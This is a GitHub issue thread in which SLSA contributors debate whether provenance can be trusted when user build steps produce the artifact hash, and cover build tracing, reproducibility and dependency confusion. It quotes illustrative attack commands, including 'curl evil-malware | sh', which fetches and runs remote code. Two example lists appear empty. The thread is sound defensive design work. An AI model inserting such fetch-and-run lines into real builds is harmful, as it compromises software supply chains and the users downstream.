slsa-framework / slsa

Supply-chain Levels for Software Artifacts
https://slsa.dev

Question on blog post about "Service Generated" #362

Open laurentsimon opened 2 years ago

laurentsimon commented 2 years ago

In the blog post https://slsa.dev/blog/2022/04/slsa-is-no-free-lunch, we say:

> Service Generated essentially means that the data in the provenance should be generated by the build service itself as opposed to output by what is running inside the user defined build step. This is important because a build is potentially running arbitrary code and has an unbounded state space. The build service which is orchestrating the build is quite limited in scope and not running unbounded user defined builds. Most build systems today require some modification and custom configuration to support this requirement.

I think there's a caveat to that: the artifact's hash. The hash ultimately comes from the "user defined build step": it is computed by the build service, but over the binary that the user-defined steps produced.

However, even at SLSA level 3, there is nothing stopping a user from doing something to the effect of:

```sh
curl some-malicious-binary > output-binary
```

So the hash is forgeable at SLSA 3, and a user can trick a trusted service into attesting to arbitrary artifacts, unless we bound the state of the "steps".

Do I understand this correctly?

mlieberman85 commented 2 years ago

Short answer I think is "yes" absolutely. Longer answer is I think there are ways to mitigate that sort of attack.

Reading through the SLSA wording:

> The output artifact hash from [Identifies Artifact](https://slsa.dev/spec/v0.1/requirements#identifies-artifact). Reasoning: This only allows a “bad” build to falsely claim that it produced a “good” artifact. This is not a security problem because the consumer MUST accept only “good” builds and reject “bad” builds.

I believe the way you would then mitigate the attack is by essentially approving only good builders. So if during certification of a builder it is performing bad operations you wouldn't certify it.

This doesn't mitigate more sophisticated attacks though where it only does the bad thing in certain situations or after a certain time.

The way I've been POCing an actual implementation of it is by using eBPF and similar tracing tools during certification of a builder/build step to ensure it's only doing what I expect it to do. I also do the same thing for certain critical builds. I will admit this doesn't scale if you have complicated, massive builds.
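As a rough sketch of the idea (my POC uses eBPF/Tracee, so take strace here as a simpler stand-in, and `./build.sh` as a hypothetical build step):

```sh
# Trace every process the build step spawns and every outbound connection it
# makes, then review the log for anything outside the expected build behavior.
strace -f -e trace=execve,connect -o build.trace ./build.sh
grep -E 'execve|connect' build.trace
```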

laurentsimon commented 2 years ago

I understand the mitigation ideas, but it's not clear what a "good build" is and how to validate this given that the space of inputs is "unbounded".

re: tracing tools during certification of a builder/build step to ensure it's only doing what I expect it to do. That only really works if you know what goes into the build yourself (if you're part of the team that publishes the artifact). Realistically, it's pretty hard to decide whether something is bad or good if it comes from a remote team, unless we agree on a set of "good build practices" to bound the scope of the input.

cc @varunsh-coder who has a GitHub action doing that via syscall introspection

laurentsimon commented 2 years ago

cc @enck interesting research problem

mlieberman85 commented 2 years ago

I guess it depends on who and what you trust. It might be a bit easier for a company to do by providing policies and best practices around the build space.

It might be harder around some open source projects if they don't have the right governance and/or the right funding to support some of these things.

laurentsimon commented 2 years ago

> I guess it depends on who and what you trust. It might be a bit easier for a company to do by providing policies and best practices around the build space.
>
> It might be harder around some open source projects if they don't have the right governance and/or the right funding to support some of these things.

+1 that makes sense.

mlieberman85 commented 2 years ago

This is actually a project we're looking at in the CNCF Security TAG: https://github.com/cncf/tag-security/issues/890 -- to take a CNCF project and try to enforce all the right build practices we can, find where there might be gaps in the tooling space and maybe work with projects like Alpha/Omega to see if there are ways we can fund additional effort.

varunsh-coder commented 2 years ago

Thanks for tagging me @laurentsimon.

https://github.com/step-security/harden-runner monitors for overwrites of source code files during the build. It also monitors outbound connections, and one can limit outbound traffic at both the DNS and TCP layers. @mlieberman85 I am curious what checks you have implemented in your POCs with eBPF.

W.r.t. real incidents, the SolarWinds breach is a great example to learn from. I think even if one had generated SLSA level 3/4 provenance on that build server, one would not be able to detect that a source file was modified. Please correct me if you think differently. The source code was changed just before the build and reverted to the original after the build completed.

There was another attack, the event-stream incident, where a dependency modified the build artifacts for one specific project (Copay) only.

I am not sure whether detecting such attacks is part of the SLSA goals or not. I think it should be, and there should be basic monitoring of the build server at the file, network, and process level, e.g. was source code, an artifact, or a dependency overwritten during the release build?
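A minimal sketch of that last check, assuming a hypothetical `./build.sh` and sources under `src/`:

```sh
# Hash the source tree before and after the release build; any source file
# that changed while the build ran is a red flag worth investigating.
find src -type f -print0 | sort -z | xargs -0 sha256sum > /tmp/src-before.sha256
./build.sh
find src -type f -print0 | sort -z | xargs -0 sha256sum > /tmp/src-after.sha256
diff /tmp/src-before.sha256 /tmp/src-after.sha256 && echo "source tree unchanged during build"
```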

TomHennen commented 2 years ago

SLSA does offer some protection against attacks like SolarWinds (see the threats pages, row D). It does this by placing higher security requirements on the build system itself. Of course if an attacker is able to circumvent the security controls then yes, the attack would still go undetected. This is where reproducible builds (just recommended at SLSA L4) probably could detect this type of attack.

mlieberman85 commented 2 years ago

@varunsh-coder I will try and find some of the demos I gave at some public working group meetings. I mostly used Aqua Security's Tracee to track what a build was doing and highlight when the build seemed to be writing stuff directly into memory and then execing it straight from memory.

@TomHennen I do like that point. SLSA puts a higher burden on the build system itself which means you know where to focus your efforts. I wonder if we can integrate or at least cite some of the best practices as defined in: https://github.com/cncf/tag-security/blob/main/supply-chain-security/supply-chain-security-paper/CNCF_SSCP_v1.pdf -- around page 20.

I think SLSA helps with reducing attack surface and limiting blast radius in this context. If you are doing the right things, the most likely attack vector becomes the build itself and you can focus on securing the areas that are harder to reason about, e.g. compilation.

laurentsimon commented 2 years ago

re: build tracing. One could also perform the tracing post-build (say, at ingestion time on the consumer side) by replaying the build command reported in the SLSA provenance. This may be viable in certain scenarios, and would not require that the original builders do it for us.

re: reproducible builds. I've heard different things around reproducibility:

  1. Some folks say that a build is reproducible if running the build multiple times on the same system gives the same binary, and we can indicate this in the SLSA provenance. In the context of SLSA provenance generation on GitHub, for example, it has been suggested that we run the build step multiple times and compare the outputs. I think this is the definition on the SLSA website https://slsa.dev/spec/v0.1/requirements#reproducible
  2. Reproducing the build on a variety of systems with high diversity (Windows, etc.) and comparing the outputs.

To me, reproducible builds means (2), but it seems like the SLSA definition is (1). I wonder if this may become a source of confusion.
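For what it's worth, here is a minimal sketch of what (1) amounts to in practice, assuming a hypothetical `./build.sh` that writes `output-binary` in a clean git checkout:

```sh
# Run the same build twice on the same runner and compare output digests;
# a mismatch means the build is not even repeatable in the sense of (1).
./build.sh && sha256sum output-binary > /tmp/first.sha256
git clean -dfx && git checkout -- .   # reset the workspace between runs
./build.sh && sha256sum output-binary > /tmp/second.sha256
diff /tmp/first.sha256 /tmp/second.sha256 && echo "repeatable on this runner"
```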

Another random note: like the artifact hash, any other artifacts generated by the untrusted build steps need additional work on the consumer side to validate. SBOMs, if generated by the compiler, are a good example of this. Is there a way for SLSA provenance to indicate whether the predicate was generated post-build? Or will we use the build service's name as a proxy to infer that? I think what I'm getting at is the need to indicate "where the provenance information came from" (untrusted build step or not).

TomHennen commented 2 years ago

What do you mean by "the same system"? Do you mean the same actual machine/service, or do you mean "org 1 built this on their own Debian 11 machine and got hash 123, and then org 2 built this on their own Debian 11 machine and got hash 123, so it's all good"?

> Is there a way for SLSA provenance to indicate whether the predicate was generated post-build?

Yes, I think the builder.id is how that will be indicated (in a roundabout way). Builders that just infer information or take it from the build step should qualify only for lower SLSA levels, and that lower level should be associated with their builder.id. Ideally it would even be nice if the security assessment for each builder were available somewhere...
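As a rough sketch (hypothetical allowlist, and assuming the DSSE envelope has already been verified and its payload decoded into `provenance.json`), a consumer-side builder.id check could look like:

```sh
# Accept provenance only from builders whose builder.id has been assessed at
# the required SLSA level; anything else is treated as a lower-level build.
BUILDER_ID=$(jq -r '.predicate.builder.id' provenance.json)
case "$BUILDER_ID" in
  https://github.com/slsa-framework/slsa-github-generator/*) echo "builder accepted" ;;
  *) echo "unrecognized or lower-level builder: $BUILDER_ID" >&2; exit 1 ;;
esac
```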

laurentsimon commented 2 years ago

> What do you mean by "the same system"? Do you mean the same actual machine/service, or do you mean "org 1 built this on their own Debian 11 machine and got hash 123, and then org 2 built this on their own Debian 11 machine and got hash 123, so it's all good"?

In the context of reusable workflows, by "same" I meant "on a GitHub runner using ubuntu-latest".

varunsh-coder commented 2 years ago

> SLSA does offer some protection against attacks like SolarWinds (see the threats pages, row D). It does this by placing higher security requirements on the build system itself. Of course if an attacker is able to circumvent the security controls then yes, the attack would still go undetected. This is where reproducible builds (just recommended at SLSA L4) probably could detect this type of attack.

Thanks for sharing, @TomHennen. I am still ramping up on the SLSA requirements, but I do have some observations w.r.t. these controls. For the SolarWinds attack, this is my assessment of what would and would not have helped. Please do correct me so I can better understand this.

| Control | SolarWinds scenario |
| --- | --- |
| Scripted build | Yes (TeamCity) |
| Build service | Yes (TeamCity + self-hosted build server) |
| Build as code | Yes (TeamCity) |
| Ephemeral | No |
| Isolated | Probably not |
| Parameterless | Not sure |
| Hermetic | Unlikely |
| Reproducible | Unlikely |

As per this, I think having an ephemeral and isolated build system would have helped, as the attacker would need to regain control for each build instead of persisting access. W.r.t. reproducible, the build could have been reproducible (if the right flags were set). But SLSA does not require one to independently verify the build, only that it be reproducible (similar to what @laurentsimon mentioned: being reproducible does not by itself lead to detection of such an attack).

Moving to ephemeral and isolated only leads to a change in attack tactics, though. E.g., the goal becomes to compromise a build tool/dependency downloaded as part of the build. In the Codecov breach, the downloaded bash script was malicious. Or in the event-stream incident, a dependency was malicious and modified the artifacts.

Just listing my thoughts to gain a better understanding of the controls.

TomHennen commented 2 years ago

> Moving to ephemeral and isolated only leads to a change in attack tactics, though.

I think what's important is that it should also increase the cost to the attacker. Yes it's still possible that they could subvert some of these controls, but they'd have to spend more of their budget to do so, and have a higher risk of detection.

varunsh-coder commented 2 years ago

> Moving to ephemeral and isolated only leads to a change in attack tactics, though.
>
> I think what's important is that it should also increase the cost to the attacker. Yes it's still possible that they could subvert some of these controls, but they'd have to spend more of their budget to do so, and have a higher risk of detection.

I think ephemeral and isolated are good controls. In addition, I do think basic DNS, network, and file monitoring is also needed for build servers. There is clear evidence that malicious build tools/dependencies are being distributed and get downloaded onto build servers.

In terms of cost: for some basic attack methods like dependency confusion, it is in some cases easier to do that (just publish a package with the same name and a higher version) than to compromise the build server. So you could have a scenario where a SLSA Level 4 build (because all controls are met) downloads a compromised build tool/dependency that either exfiltrates credentials (signing keys, for example, as in the Codecov/HashiCorp cases) or modifies source code/artifacts, and that goes completely undetected.

laurentsimon commented 2 years ago

The dependencies of the builder itself are reported in the materials section of the SLSA provenance. So although it may not prevent the attack, it should be retroactively detectable once the attack is discovered. Unless the dependency is also used by the provenance generation code or is part of the OS :/ ... Actually, it's an interesting question what the minimum set of builder dependencies should be. We could have very small custom builders tuned to a very specific build pipeline.

In general, you're right that we need to keep the dependencies of the builder itself to a minimum.

TomHennen commented 2 years ago

I think some aspects of dependency confusion can be resolved by verifying dependencies during the build process against some policy (either full or delegated as discussed in this blog post series).
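One concrete (if partial) example of such a policy is pinning every dependency to a known digest so a confused or substituted package fails the build; this is just a sketch, not the full/delegated policy mechanism from those blog posts:

```sh
# Python: every requirement must carry a --hash entry; anything whose digest
# doesn't match fails the install.
pip install --require-hashes -r requirements.txt
# Node: install exactly what package-lock.json pins (names, versions, integrity hashes).
npm ci
```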

varunsh-coder commented 2 years ago

> I think some aspects of dependency confusion can be resolved by verifying dependencies during the build process against some policy (either full or delegated as discussed in this blog post series).

Interesting. What sort of policy would this be? In the sense: what attribute/metadata of the dependency would it verify to look for dependency confusion?

dn-scribe commented 2 years ago

Hi, I'm not sure this is the right place, but I'll give it a shot. Above, @mlieberman85 quoted the following from the standard:

> The output artifact hash from [Identifies Artifact](https://slsa.dev/spec/v0.1/requirements#identifies-artifact). Reasoning: This only allows a “bad” build to falsely claim that it produced a “good” artifact. This is not a security problem because the consumer MUST accept only “good” builds and reject “bad” builds.

I did not understand this statement. Why can't a bad build (a malicious user-controlled build script, or a vulnerable build tool) both modify an artifact and supply its hash as the artifact hash?

Is it due to the SLSA assumption that the build machine/process is trusted to generate trustworthy provenance?

As I understand it, there may be no real or better option for establishing the artifact identity, but I did not get why a bad build could only give the hash of a good artifact.

Could someone please clarify?

mlieberman85 commented 2 years ago

It should be clarified a bit, but the idea is that a good build would never falsely claim to have generated a bad artifact. In addition, since only the artifact hash is allowed to be determined by the build script, the other things you mentioned (a malicious build script or a vulnerable tool) would be included in the provenance and should be caught.

MarkLodato commented 2 years ago

I agree that the docs need significant improvement here. Let me take a shot at explaining by way of example, which we can then move into the official docs if it reads well. Also, some of this can be found within https://slsa.dev/threats.

Example: The Python package PyYAML is supposed to be built from https://github.com/yaml/pyyaml using (let's pretend) GitHub Actions workflow ci.yaml.

To build v6.0, the official workflow (i.e. "good" build) really did produce a file with sha256 hash f84f…90b5. This was by definition correct because it was the official process from the official source code. The requirement in question says that the builder must certify that all the other fields within the provenance are correct. For example:

Does that help?

dn-scribe commented 2 years ago

Thanks for the prompt responses.

Sorry, but I'm not convinced;

The assumption behind "service generated provenance" is that user-script generated provenance is not trustworthy enough.

An attacker that can determine the artifact identity will find something evil to do with this capability.

Examples:

To make things clear, I think that requiring the build service to fill in the artifact hash is a tough requirement, hard to apply in practice. Usually build systems, which are generic, do not know what the artifact is. It could be some string hiding in a makefile, or generated on the fly using environment variables, time, and other parameters unknown to the build service.

The reason to allow the user script to determine the artifact hash should be a practical necessity and not because there is no risk.

What do you think?

MarkLodato commented 2 years ago

@dn-scribe, sorry, no, I disagree. Those examples are all things where the consumer does the wrong, insecure thing. Consumers should only accept artifacts after verifying them against some policy. I think this will all become clearer once we have concrete prototype implementations.
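As a rough sketch of the kind of policy check I mean, assuming the provenance statement has already been decoded into `provenance.json` and using the PyYAML 6.0 sdist from the example above:

```sh
# Accept the artifact only if its digest matches the provenance subject;
# a builder.id check (as discussed earlier in the thread) would sit alongside this.
EXPECTED=$(jq -r '.subject[0].digest.sha256' provenance.json)
ACTUAL=$(sha256sum PyYAML-6.0.tar.gz | cut -d' ' -f1)
[ "$EXPECTED" = "$ACTUAL" ] || { echo "artifact does not match provenance subject" >&2; exit 1; }
echo "artifact matches provenance subject"
```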

MarkLodato commented 1 year ago

Could someone describe the specific issue that we want to address in the specification? I read through this entire thread but was unable to turn that into something actionable.

dn-scribe commented 1 year ago

As I see it there are two issues that got mixed up here:

  1. Who should attest to the built artifact hash. The current definition here is that the build script can, even though it is not totally trusted. The discussion was mainly answering why: is it a practical necessity, or is it secure enough? My take is that it is a necessity, but the standard should explain why, what the risks are, and what the implementor is expected to do.
  2. What saves us from "curl evil-malware | sh" in a build script? The answer, as I understand it, is the SLSA L4 review requirement.

MarkLodato commented 1 year ago

Thank you for the summary, @dn-scribe! That is extremely helpful. We'll try to work this into the spec.